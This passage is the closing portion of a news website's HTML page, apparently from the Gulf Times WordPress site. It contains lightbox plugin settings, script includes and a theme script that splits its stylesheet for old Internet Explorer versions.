gallery","jqlb_close_image_max_heght":"22","jqlb_image_for_close_lightbox":"http:\/\/www.gulftimes.com\/wp-content\/plugins\/wp-lightbox-2\/styles\/images\/closelabel.gif","jqlb_keyboard_navigation":"1","jqlb_popup_size_fix":"0"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.gulftimes.com/wp-content/plugins/wp-lightbox-2/wp-lightbox-2.min.js?ver=1.3.4.1'></script>
<script type='text/javascript' src='http://www.gulftimes.com/wp-content/themes/Newspaper/js/tagdiv_theme.js?ver=6.5.1'></script>
<script type='text/javascript' src='http://www.gulftimes.com/wp-includes/js/comment-reply.min.js?ver=4.4.5'></script>
<script type='text/javascript' src='http://www.gulftimes.com/wp-includes/js/wp-embed.min.js?ver=4.4.5'></script>

<!-- JS generated by theme -->

<script>
    

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'http://www.gulftimes.com/wp-content/themes/Newspaper/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'http://www.gulftimes.com/wp-content/themes/Newspaper';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>


</body>
</html>